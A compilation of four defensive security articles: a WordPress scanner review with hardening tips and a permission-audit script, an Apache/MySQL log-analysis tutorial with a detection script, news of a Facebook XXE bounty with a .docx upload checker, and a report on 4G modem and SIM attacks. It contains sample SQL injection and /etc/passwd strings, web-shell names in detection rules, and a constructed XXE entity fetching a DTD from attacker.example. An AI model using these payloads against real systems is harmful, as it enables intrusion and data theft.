WordPress is a popular content management system and blogging platform used by millions of websites. This is the reason hackers are targeting WordPress. Although the WordPress community is very active and keeps working to make it secure in the best possible ways, most of the time third-party themes and plugins make WordPress vulnerable. Sometimes zero-day vulnerabilities hit WordPress, and as a result we see mass hacking attacks on WordPress. This is the reason WordPress users should always try to keep their WordPress website safe from hackers. According to reports published a few months back, more than 70% of WordPress websites are vulnerable to various attacks. The number of hacked WordPress websites is growing every year. Generally, people think “why would someone hack my website?” and “I have nothing to lose.” But this is not true. If you have a less important website, hackers are not interested in your data. But they are interested in your server, and they can use it to send spam emails. If you have important data, then they will hack into your website and steal it. Most big companies hire security analysts who keep finding vulnerabilities and patch them before hackers get in. But what about users who have a lower budget? If you have technical knowledge, you can make your WordPress secure by using known security plugins. And there are a few tools which help us find vulnerabilities in a WordPress installation. By knowing the vulnerabilities, you can take action on patching them. In this article, I am going to write about a less popular but effective tool called WPScanner. WPScanner is a WordPress security scanning tool developed by a well-known company, WebSecurify. I already wrote an article on the WebSecurify vulnerability scanner. You can read that previous article to learn how it works.

Note: Before reading more about this tool, you should know that this tool only identifies and summarizes the vulnerabilities found in WordPress. Listed vulnerabilities will be sorted from high to low severity. Reports can also be exported in various formats.

Why did WebSecurify develop this tool if it already has the scanner? Actually, the reason was pretty simple. The company said that they made a separate tool for WordPress because there was a need for a WordPress-optimized tool. There are millions of websites running on it, and users are less techy. So, a WordPress-optimized tool was needed. This tool only needs a URL and no complicated configuration.

Now, back to WPScanner. This is not a standalone tool but a browser extension. This browser extension works with the WebSecurify Browser Extension (install it if it asks). It automatically identifies your browser and then asks to install WebSecurify if needed. When you open this tool in a browser, you will see a simple interface which is quite similar to the WebSecurify tool’s interface. There is a big text box at the top to enter the target URL, and at the left side, a few options.

Figure 1: WPScanner interface

If we take a look at the options on the left side, you will see five big icons for five different options. The first option, with the WordPress icon, is the homepage for this tool. Clicking on this will open the tool in a new tab. So there is nothing in this. The second option, which has a gear icon, is for the settings of the tool. This is the important section which you must take a look at before using this tool.

Figure 2: WPScanner settings page

The first settings option is to exclude URLs from the tool’s scope. If you want to ignore a few URLs, you should write them here on separate lines. URLs like log out and search can be included in this, as they have no impact or may be the reason for false results. The second option is to include URLs which must be in the scope of the tool. So, you should add those URLs which are most sensitive here. The third option is to set the maximum depth of URLs to which the spider of the tool should go. Keep this low, because setting this to a high value will have an impact on your server, and it may take your server down. The last option is to test the scope. So, add those URLs where you want to test this tool first.

The third icon is for exporting the reports. You can export a vulnerability report in HTML, XML, JSON and CSV formats. Use this item when you are done with scanning your website. Then forward this report to a security guy, or if you can, check it yourself.

Figure 3: WPScanner export options

The fourth icon is help, which has nothing to help at all.

Figure 4: WPScanner help page

The last option is the global menu, which links to all the WebSecurify web apps. You can check other security apps by WebSecurify. I will try to write about those apps in the next few articles.

Figure 5: WPScanner’s other apps

The overview of the article has come to an end. Now, we will enter the target and try to scan it to find the potential vulnerabilities in it. When you try to start scanning, it will ask you to understand and confirm that this can damage your application. It is because the crawler will hit your website to scan it. If your server has a low configuration, it may add enough load to take it down. This is because automated security testing tools send arbitrary data to find security vulnerabilities in an application. This is why we recommend creating a demo copy of your product if it is running. Running it on a live environment may harm your application. It may also lead to a denial of service. And in the worst case, if your application handles complicated tasks related to money, you may get a big financial loss. So, be careful.

Once the scan has been started, it will start showing you information related to the WordPress theme and plugins. You can see the progress bar to check how much of the operation has been performed. Before every finding, it also shows the severity, marked as Low, Medium or High. It also lists text about impact, solution, details and references, to learn more about that specific vulnerability. A few vulnerabilities listed will be marked as Informational. You do not have to think about those. Now sit down and relax. The scan will take enough time based on the size of your website. It will crawl all the pages of your website and scan them against its vulnerability database. It uses the known vulnerabilities to match against the pages of your website and find the vulnerabilities. So, newly found zero-day vulnerabilities are not included. You can pause or stop the scan any time you want. And once you are done, you can export the report in the available formats.

How to patch vulnerabilities found by WPScanner

Now, when we have the list of known vulnerabilities of the website, the big question is how to start. So let me explain the thing in short. First of all, you will have to filter the informational details from the report, because you do not need to take action on those informational vulnerabilities. Those are only for information purposes. Now, start with high severity vulnerabilities. This tool already offers the possible solution and reference links. You can use the listed solution and read the references to learn more about the vulnerability and its effects. If you already know much about security, I am sure you will be able to understand how this vulnerability will affect you. Otherwise, you will have to take the help of any of your friends who can understand this. You should always try to get rid of these high and medium severity vulnerabilities as soon as possible. If the vulnerabilities are in a plugin, then deactivate that plugin and do not activate it until the update is available to patch the vulnerability. Similarly, you should also change the theme if there is any vulnerability in the theme.

Additional steps to make your WordPress website safe from hackers

If you are a WordPress user, you should try the above tool to find the vulnerabilities in your WordPress blog. But this is not the end. You should also follow some more steps to tighten the security of your blog.

Keep your WordPress version, themes and plugins up to date. WordPress regularly pushes updates which also contain security fixes. Themes and plugins also push similar updates to patch known bugs and security issues.

Don’t use the default username “admin”. Hackers generally try brute-forcing, and this name can be guessed. By using this common username, you are making the hacking process easier for hackers.

Protect the WordPress admin area, wp-admin or the wp-login.php file. You can use htaccess to only allow access to this file from a specific IP address. You can do this by adding this code in htaccess:

<Files wp-login.php>
order deny,allow
Deny from all
# allow access from my IP address
allow from xxx.xxx.xxx.xxx
</Files>

Add your own IP address in place of xxx.xxx.xxx.xxx. If you think that this is not possible, you can instead limit login attempts on your WordPress blog. You will find many tutorials on this.

Use a strong password for your WordPress account. I know you already know this, and people repeat it all the time. But you should believe me that this is the must-follow step. The stronger the password you use, the more difficult it is for hackers to hack into your website.

Use only trusted sources to download themes and plugins. I recommend never going with nulled themes and plugins, because they may contain malicious code. These kinds of plugins or themes with malicious code can open a backdoor on your website. So, please stay away and download or purchase themes only from reputable sources.

Sometimes, your server may expose your website to hackers. So make sure that you are using a secure web server.
If you are using managed hosting, then it is possible that the web hosting company is working to make it secure. But if you are using an unmanaged server, then you have to do it yourself. Use correct file permissions on your server. Setting a directory with 777 permissions may allow a malicious script to upload a file or modify existing file on the server. So, take care of the permissions. All directories should have 755 or 750 permissions. For files, make sure they have 644 or 640. Wp-config.php is the most sensitive file and it must have 600 file permissions. At last, I want to add that you should backup your website often. This is a must-follow step. That way, you will have the backup always ready to recover your website in case something bad happens. Conclusion WPScanner is a nice scanning tool for WordPress which can help you in identifying the vulnerabilities on your website. Like other automated scanners, it can also list all the potential vulnerabilities of your website. Now it is up to you to manually verify the listed vulnerabilities and then fix if they really exist. Because most of the time, automated scanners list false vulnerabilities due to a few reasons. I tried this tool on a few websites and found it useful. But don’t rely on this tool alone. And follow the security steps I added at the end of the post. These steps will help you in keeping the hacker away from your website. Always update your blog’s WordPress, theme and plugins. And at least you can do this whenever the update is available. A few other security plugins also claim to help. I will be reviewing those plugins in upcoming posts. Please comment below if you have any doubt or any question regarding WordPress security or WP Scanner. I will try to respond as soon as I can. References Hardening WordPress « WordPress Codex https://suite.websecurify.com/apps/wpscanner/ More Than 70% of WordPress Installations are Vulnerable Source
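A script that checks the permission rules from the post above (directories 755 or 750, files 644 or 640, wp-config.php 600, nothing world-writable), as an added example; it is not part of the original post and not a WebSecurify tool. The WordPress-like tree it audits is constructed in a temporary directory so the script runs offline, and the High/Medium/Low labels are my own mapping of the rules onto the scanner's severity scale, not something the post defines.

```python
import os
import stat
import tempfile

# Policy from the post: directories 755/750, files 644/640, wp-config.php 600.
ALLOWED_DIR_MODES = {0o755, 0o750}
ALLOWED_FILE_MODES = {0o644, 0o640}
WP_CONFIG_MODE = 0o600


def classify(rel_path, mode, is_dir):
    """Return (severity, reason) for one entry, or None if it follows the policy.

    The severity mapping is an assumption made for this example.
    """
    if mode & stat.S_IWOTH:  # 777, 666, ...: any local user or script can write here
        return ("High", f"world-writable ({mode:o})")
    if is_dir:
        if mode not in ALLOWED_DIR_MODES:
            return ("Medium", f"directory mode {mode:o}, expected 755 or 750")
        return None
    if os.path.basename(rel_path) == "wp-config.php":
        if mode != WP_CONFIG_MODE:
            return ("High", f"wp-config.php mode {mode:o}, expected 600")
        return None
    if mode not in ALLOWED_FILE_MODES:
        return ("Low", f"file mode {mode:o}, expected 644 or 640")
    return None


def audit_tree(root):
    """Walk root and return [(severity, relative_path, reason), ...] sorted by path."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for name, is_dir in entries:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a symlink's own mode is meaningless; audit its target separately
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            verdict = classify(name, mode, is_dir)
            if verdict:
                findings.append((verdict[0], os.path.relpath(full, root), verdict[1]))
    return sorted(findings, key=lambda f: f[1])


def build_sample_tree(root):
    """Constructed WordPress-like tree for the demo (not a real install)."""
    layout = {
        "index.php": (0o644, False),
        "wp-config.php": (0o644, False),                # too open: should be 600
        ".htaccess": (0o640, False),
        "wp-content": (0o755, True),
        "wp-content/uploads": (0o777, True),            # the classic mistake
        "wp-content/plugins": (0o750, True),
        "wp-content/plugins/hello.php": (0o664, False),  # group-writable file
    }
    for rel, (mode, is_dir) in layout.items():
        path = os.path.join(root, rel)
        if is_dir:
            os.makedirs(path, exist_ok=True)
        else:
            with open(path, "w") as fh:
                fh.write("<?php // sample\n")
        os.chmod(path, mode)  # explicit chmod so the umask does not interfere
    return root


def run_demo():
    """Build the constructed tree in a fresh temp dir and audit it."""
    return audit_tree(build_sample_tree(tempfile.mkdtemp(prefix="wp-audit-")))


if __name__ == "__main__":
    for severity, rel, reason in run_demo():
        print(f"[{severity}] {rel}: {reason}")
```

Point `audit_tree()` at a real document root to use it; it only reads metadata and never changes a mode, so the fix (chmod, or a restore from backup) stays a deliberate step.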
-
Introduction

It is often the case that web applications face suspicious activity for various reasons, such as a kid scanning a website using an automated vulnerability scanner or a person trying to fuzz a parameter for SQL Injection, etc. In many such cases, the logs on the web server have to be analyzed to figure out what is going on. If it is a serious case, it may require a forensic investigation. Apart from this, there are other scenarios as well. For an administrator, it is really important to understand how to analyze the logs from a security standpoint. People who are just beginning with hacking/penetration testing must understand why they should not test/scan websites without prior permission. This article covers the basic concepts of log analysis to provide solutions to the above mentioned scenarios.

Setup

For demo purposes, I have the following setup.

Apache server – pre-installed in Kali Linux. This can be started using the following command:

service apache2 start

MySQL – pre-installed in Kali Linux. This can be started using the following command:

service mysql start

A vulnerable web application built using PHP-MySQL. I have developed a vulnerable web application using PHP and hosted it on the above mentioned Apache-MySQL.

With the above setup, I have scanned the URL of this vulnerable application using a few automated tools (ZAP, w3af) available in Kali Linux. Now let us see various cases in analyzing the logs.

Logging in the Apache server

It is always recommended to maintain logs on a web server for various obvious reasons. The default location of Apache server logs on Debian systems is /var/log/apache2/access.log

Logging is just the process of storing the logs on the server. We also need to analyze the logs for proper results. In the next section, we will see how we can analyze the Apache server’s access logs to figure out if there are any attacks being attempted on the website.

Analyzing the logs

Manual inspection

In cases of logs with a smaller size, or if we are looking for a specific keyword, we can spend some time observing the logs manually using things like grep expressions. In the following figure, we are trying to search for all the requests that have the keyword “union” in the URL.

From the figure above, we can see the query “union select 1,2,3,4,5” in the URL. It is obvious that someone with the IP address 192.168.56.105 has attempted SQL Injection. Similarly, we can search for specific requests when we have the keywords with us. In the following figure, we are searching for requests that try to read “/etc/passwd”, which is obviously a Local File Inclusion attempt.

If we observe closely, there is a file named “b374k.php” being accessed. “b374k” is a popular web shell and hence this file is purely suspicious. Looking at the response code “200”, this line is an indicator that someone has uploaded a web shell and is accessing it from the web server. It is not always the case that the uploaded web shell is given its original name when uploading it onto the server. In many cases, attackers rename them to avoid suspicion. This is where we have to act smart and see if the files being accessed are regular files or if they look unusual. We can go further ahead and also look at file types and time stamps if anything looks suspicious.

One single quote for the win

It is a known fact that SQL Injection is one of the most common vulnerabilities in web applications. Most of the people who get started with web application security start their learning with SQL Injection. Identifying a traditional SQL Injection is as easy as appending a single quote to the URL parameter and breaking the query. Anything that we pass can be logged on the server, and it is possible to trace it back. The following screenshot shows the access log entry where a single quote is passed to check for SQL Injection in the parameter “user”.

%27 is the URL-encoded form of a single quote.

For administration purposes, we can also perform query monitoring to see which queries are executed on the database. If we observe the above figure, it shows the query being executed from the request made in the previous figure, where we are passing a single quote through the parameter “user”. We will discuss more about logging in databases later in this article.

Analysis with automated tools

When there is a huge amount of logs, it is difficult to perform manual inspection. In such scenarios we can go for automated tools along with some manual inspection. Though there are many effective commercial tools, I am introducing a free tool known as Scalp. According to their official link, “Scalp is a log analyzer for the Apache web server that aims to look for security problems. The main idea is to look through huge log files and extract the possible attacks that have been sent through HTTP/GET.”

Scalp can be downloaded from the following link.

https://code.google.com/p/apache-scalp/

It is a Python script, so it requires Python to be installed on our machine. The following figure shows the help for the usage of this tool.

As we can see in the figure, we need to feed the log file to be analyzed using the flag “-l”. Along with that, we need to provide a filter file using the flag “-f”, with which Scalp identifies the possible attacks in the access.log file. We can use a filter from the PHPIDS project to detect any malicious attempts. This file is named default_filter.xml and can be downloaded from the link below.

https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.xml

The following piece of code is a part taken from the above link.

<filter>
    <id>12</id>
    <rule><![CDATA[(?:etc\/\W*passwd)]]></rule>
    <description>Detects etc/passwd inclusion attempts</description>
    <tags>
        <tag>dt</tag>
        <tag>id</tag>
        <tag>lfi</tag>
    </tags>
    <impact>5</impact>
</filter>

It uses rule sets defined in XML tags to detect various attacks being attempted. The above code snippet is an example to detect a file inclusion attempt. Similarly, it detects other types of attacks. After downloading this file, place it in the same folder where Scalp is placed. Run the following command to analyze the logs with Scalp.

python scalp-0.4.py -l /var/log/apache2/access.log -f filter.xml -o output --html

Note: I have renamed this file on my system to access.log.1 in the screenshot. You can ignore it.

‘output’ is the directory where the report will be saved. It will automatically be created by Scalp if it doesn’t exist. --html is used to generate a report in HTML format.

As we can see in the above figure, Scalp’s results show that it has analyzed 4001 lines out of 4024 and found 296 attack patterns. We can even save the lines that are not analyzed for some reason using the “--except” flag.

A report is generated in the output directory after running the above command. We can open it in a browser and look at the results. The following screenshot shows a small part of the output that shows directory traversal attack attempts.

Logging in MySQL

This section deals with analysis of attacks on databases and possible ways to monitor them. The first step is to see which variables are set. We can do it using “show variables;” as shown below. The following figure shows the output for the above command.

As we can see in the above figure, logging is turned on. By default this value is OFF. Another important entry here is “log_output”, which says that we are writing them to a “FILE”. Alternatively, we can use a table too. We can also see that “log_slow_queries” is ON. Again, the default value is “OFF”. All these options are explained in detail and can be read directly from the MySQL documentation provided in the link below.

MySQL :: MySQL 5.0 Reference Manual :: 5.2 MySQL Server Logs

Query monitoring in MySQL

The general query log logs established client connections and statements received from clients. As mentioned earlier, by default these are not enabled since they reduce performance. We can enable them right from the MySQL terminal or we can edit the MySQL configuration file as shown below. I am using the VIM editor to open the “my.cnf” file, which is located under the “/etc/mysql/” directory.

If we scroll down, we can see a Logging and Replication section where we can enable logging. These logs are being written to a file called mysql.log. We can also see the warning that this log type is a performance killer. Usually administrators use this feature for troubleshooting purposes. We can also see the entry “log_slow_queries” to log queries that take a long time.

Now everything is set. If someone hits the database with a malicious query, we can observe that in these logs as shown below. The above figure shows a query hitting the database named “webservice” and trying for an authentication bypass using SQL Injection.

More logging

By default, Apache logs only GET requests. To log POST data, we can use an Apache module called “mod_dumpio”. To know more about the implementation part, please refer to the link below.

mod_dumpio - Apache HTTP Server Version 2.2

Alternatively, we can use ‘mod_security’ to achieve the same result.

Reference

Log Files - Apache HTTP Server Version 2.2

Source
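The manual grep checks and the Scalp/PHPIDS filter approach from the post above, combined into one script as an added example; this is not Scalp's code and not code from the original post. It reads filters written in the PHPIDS default_filter.xml layout (rule 12 is the one quoted in the post; rules 901 and 902 are constructed here and are not real PHPIDS ids), URL-decodes each request line until it stops changing so double encoding cannot hide a payload, and scores every client IP by the summed impact of the rules it tripped. The log lines are constructed to mirror the post's screenshots (the SQL injection from 192.168.56.105, the /etc/passwd read, the b374k.php access served with a 200).

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET
from collections import defaultdict

# Three filters in the PHPIDS default_filter.xml layout. Rule 12 is the one
# quoted in the post; rules 901 and 902 are constructed for this demo and are
# not real PHPIDS rule ids.
FILTER_XML = r"""<filters>
  <filter>
    <id>12</id>
    <rule><![CDATA[(?:etc\/\W*passwd)]]></rule>
    <description>Detects etc/passwd inclusion attempts</description>
    <tags><tag>dt</tag><tag>id</tag><tag>lfi</tag></tags>
    <impact>5</impact>
  </filter>
  <filter>
    <id>901</id>
    <rule><![CDATA[(?i)union\s+(?:all\s+)?select\b]]></rule>
    <description>Constructed: UNION SELECT probe</description>
    <tags><tag>sqli</tag></tags>
    <impact>6</impact>
  </filter>
  <filter>
    <id>902</id>
    <rule><![CDATA[(?:^|/)(?:b374k|c99|r57)[^/]*\.php]]></rule>
    <description>Constructed: request for a well-known PHP web shell filename</description>
    <tags><tag>shell</tag></tags>
    <impact>8</impact>
  </filter>
</filters>"""

# Constructed Apache combined-format lines modelled on the post's screenshots.
SAMPLE_LOG = """\
192.168.56.105 - - [10/Dec/2014:10:14:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.56.105 - - [10/Dec/2014:10:14:05 +0000] "GET /index.php?id=1%27+union+select+1,2,3,4,5+--+ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.56.105 - - [10/Dec/2014:10:14:09 +0000] "GET /view.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 987 "-" "Mozilla/5.0"
192.168.56.105 - - [10/Dec/2014:10:14:12 +0000] "GET /view.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 987 "-" "Mozilla/5.0"
192.168.56.110 - - [10/Dec/2014:10:20:41 +0000] "GET /uploads/b374k.php HTTP/1.1" 200 41210 "-" "Mozilla/5.0"
192.168.56.1 - - [10/Dec/2014:10:21:00 +0000] "GET /about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache common/combined log format: client, ident, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) '
)


def load_filters(xml_text):
    """Parse PHPIDS-style <filter> elements into compiled rules."""
    filters = []
    for node in ET.fromstring(xml_text).iter("filter"):
        filters.append({
            "id": int(node.findtext("id")),
            "rule": re.compile(node.findtext("rule")),
            "description": node.findtext("description"),
            "tags": [t.text for t in node.iter("tag")],
            "impact": int(node.findtext("impact")),
        })
    return filters


def decode(path, rounds=3):
    """URL-decode repeatedly (bounded) so %25-style double encoding cannot hide a payload."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze(lines, filters):
    """Return (hits, score_per_ip): one hit per request that trips at least one filter."""
    hits = []
    score = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a common/combined-format line; Scalp skips these too
        path = decode(m["path"])
        fired = [f for f in filters if f["rule"].search(path)]
        if not fired:
            continue
        impact = sum(f["impact"] for f in fired)
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            "path": path,
            "rules": [f["id"] for f in fired],
            "tags": sorted({t for f in fired for t in f["tags"]}),
            "impact": impact,
        })
        score[m["ip"]] += impact
    return hits, dict(score)


def run_demo():
    """Run the constructed log through the constructed filter set."""
    return analyze(SAMPLE_LOG.splitlines(), load_filters(FILTER_XML))


if __name__ == "__main__":
    hits, score = run_demo()
    for h in hits:
        # A web shell request answered with 200 is the case the post singles out.
        flag = "  <-- served 200, check the file on disk" if 902 in h["rules"] and h["status"] == 200 else ""
        print(f"{h['ip']} {h['time']} {h['path']} rules={h['rules']} impact={h['impact']}{flag}")
    print("per-client score:", score)
```

To use it on a real log, replace `SAMPLE_LOG` with the contents of access.log and `FILTER_XML` with the full PHPIDS default_filter.xml; the filters are applied to the decoded request line only, so, like Scalp, this sees nothing of POST bodies.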
-
A vulnerability was discovered and patched in a third-party service that handles resumes on Facebook’s careers page. The discovery was worth more than $6,000 in a bounty paid out by Facebook to researcher Mohamed Ramadan of Egypt, who published some details of the vulnerability and exploit on his website.

Ramadan said the vulnerability is a blind XXE (XML External Entity) Out of Band bug. It allowed him to upload a .docx file to the careers page with some additional code that was not vetted by the third-party service. The careers page accepts resumes only in PDF or .docx formats.

Ramadan said he was able to use the 7zip program to extract the XML contents of the .docx file he’d created. He opened a file called [Content_Types].xml and inserted benign code that he uploaded to the page. The code, he said, connected to his Python HTTP server 15 minutes later.

Ramadan said that while his attack code was innocuous, a hacker could carry out any number of malicious activities, including a denial-of-service attack on the parsing system, carrying out TCP scans using HTTP external entities, gaining unauthorized access to data stored as XML files, carrying out denial-of-service attacks on other systems, reading system and application files, executing more code, or using connected applications for DDoS attacks. Since the third-party service, however, was not part of Facebook’s production environment, user data and Facebook source code were not at risk.

This is not the first time Ramadan has been rewarded with a Facebook bounty. In October 2013, he found vulnerabilities in the Facebook Messenger apps for Android that enabled any other app on a device to access the user’s Facebook access token and take over her account, and a similar flaw in the Facebook Pages Manager for Android, an app that allows admins to manage multiple Facebook accounts. That bug also enabled other apps to grab a user’s access token.

Facebook has tackled XXE bugs before. In January, it paid out a $33,500 bounty to a Brazilian researcher who found an XXE vulnerability in Facebook’s Forgot Your Password service. He reported the XXE bug and asked Facebook for permission to escalate it to a remote code execution flaw. Facebook quickly patched, but Silva shared his potential exploit with the Facebook security team, which decided it merited a major bounty.

Source
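An upload pre-check for the .docx trick described above, as an added example; it is not code from Facebook, the third-party service, or Ramadan's write-up. A .docx is a zip of XML parts, and OOXML parts do not use DTDs, so the check treats a DOCTYPE or ENTITY declaration in any part as an XXE attempt and refuses the file before an XML parser ever sees it. Both archives are constructed in memory, and the entity URL attacker.example is a placeholder, not a real host or the payload from the report.

```python
import io
import re
import zipfile

# DTD machinery inside a part is suspicious: OOXML parts never declare a DOCTYPE.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
MAX_PART_BYTES = 5 * 1024 * 1024  # assumed cap: refuse oversized parts (zip bombs)

CONTENT_TYPES_OK = b"""<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>
"""

# Constructed blind/out-of-band XXE shape: a parameter entity pulls a remote DTD,
# which is what makes the parser call home. attacker.example is a placeholder.
CONTENT_TYPES_XXE = CONTENT_TYPES_OK.replace(
    b"<Types ",
    b'<!DOCTYPE Types [\n  <!ENTITY % remote SYSTEM "http://attacker.example/xxe.dtd">\n  %remote;\n]>\n<Types ',
    1,
)


def build_docx(content_types):
    """Assemble a minimal .docx (an OPC zip) in memory from the given [Content_Types].xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr(
            "_rels/.rels",
            b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
            b'</Relationships>',
        )
        zf.writestr(
            "word/document.xml",
            b'<?xml version="1.0" encoding="UTF-8"?>\n'
            b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            b'<w:body><w:p><w:r><w:t>resume</w:t></w:r></w:p></w:body></w:document>',
        )
    return buf.getvalue()


def inspect_docx(data):
    """Return a list of reasons to reject the upload; an empty list means it passed the pre-check."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    problems = []
    with zf:
        if "[Content_Types].xml" not in zf.namelist():
            problems.append("missing [Content_Types].xml")
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_PART_BYTES:
                problems.append(f"{info.filename}: part too large ({info.file_size} bytes)")
                continue
            # Every part is scanned, not only *.xml: [Content_Types].xml can map any name to XML.
            m = DTD_RE.search(zf.read(info.filename))
            if m:
                problems.append(f"{info.filename}: {m.group().decode()} declaration at byte {m.start()}")
    return problems


if __name__ == "__main__":
    for label, doc in (("clean", build_docx(CONTENT_TYPES_OK)), ("xxe", build_docx(CONTENT_TYPES_XXE))):
        print(label, inspect_docx(doc) or "ok")
```

This is a pre-filter, not the fix: whatever parses the parts afterwards still has to be configured to refuse DTDs and external entities (in Python, the defusedxml package does this), because a parser that resolves entities will happily fetch attacker.example on its own the moment a payload slips past a byte-level check.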
-
Researchers say 4G USB modems contain exploitable vulnerabilities through which attackers could, and researchers have, managed to gain full control of the machines to which the devices are connected.

Researchers from Positive Technologies presented a briefing detailing how to compromise USB modems and attack SIM cards via SMS over 4G networks at the PacSec and Chaos Computer Club conferences in Tokyo and Hamburg, respectively, over the last month. In addition to allowing full machine access, the 4G modem attack also yielded access to subscriber accounts on the relevant carrier portals. By sending a binary SMS, the researchers managed to lock SIM cards and sniff and decrypt device traffic.

The research was carried out by a Positive Technologies team consisting of Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov.

Of the six USB modems with 30 separate firmware installations tested, the researchers found that just three firmware varieties were resistant to their attacks. They managed to find publicly available telnet access credentials via Google, but they needed HTTP access in order to monitor communications. After connecting their USB modems to their machines and listing the devices as distinct nodes with web applications, the researchers were able to launch browser-based cross-site request forgery, cross-site scripting and remote code execution attacks. Through these attacks, the researchers obtained information regarding international mobile subscriber identities, universal integrated circuit cards, international mobile station equipment identities and software versions, device names, firmware versions, Wi-Fi status and more.

In addition to information, the researchers compelled the modems to change DNS settings in order to sniff traffic, change SMS center settings in order to intercept and interfere with SMS messaging, change passwords on self-service portals, lock modems by deliberately entering wrong PIN or PUK codes, and remotely update modem firmware to vulnerable versions.

The researchers noted in a blog post that the impact of their attack methods is not limited to consumers using affected smartphones. Any number of critical infrastructure installations, including industrial control systems (ICS) and supervisory control and data acquisition (SCADA) machines, use mobile communication technology based largely or at least in part on the GSM standard. Certain ATMs also deploy these USB modem technologies to remotely transmit payment data.

Their SIM attack was slightly less effective, having only managed to exploit some 20 percent of the 100 SIM cards they tested. In fact, these attacks were more or less a matter of whether or not the researchers could brute-force the Data Encryption Standard (DES) keys protecting the SIMs. 3DES keys take substantially longer to break.

“To brute-force DES keys, we use a set of field-programmable gate arrays (FPGA), which became trendy for Bitcoin mining a couple of years ago and got cheaper after the hype was over,” the researchers wrote. “The speed of our 8 modules *ZTEX 1.15y board with the price tag of 2,000 Euro is 245.760 Mcrypt/sec. It is enough to obtain the key within 3 days.”

That was their fastest brute-force. If they had a partially known 3DES key, they could break it in 10 days. Deploying standard processing power, like an Intel CPU (Core i7-2600k), would take roughly five years to break DES and more than 20 years to break 3DES.

Once DES or 3DES is broken, the researchers said they could issue commands to toolkit applications (TAR). One such TAR was a file system storing Temporary Mobile Subscriber Identity and Ciphering Keys. This access gave the researchers the ability to decrypt subscriber traffic without using brute-force attacks on DES, spoof a subscriber’s identity in order to receive her calls and texts, track a subscriber’s location and cause a denial of service by entering three wrong PIN codes and 10 wrong PUK codes in a row if PIN code is enabled for file system protection.

Source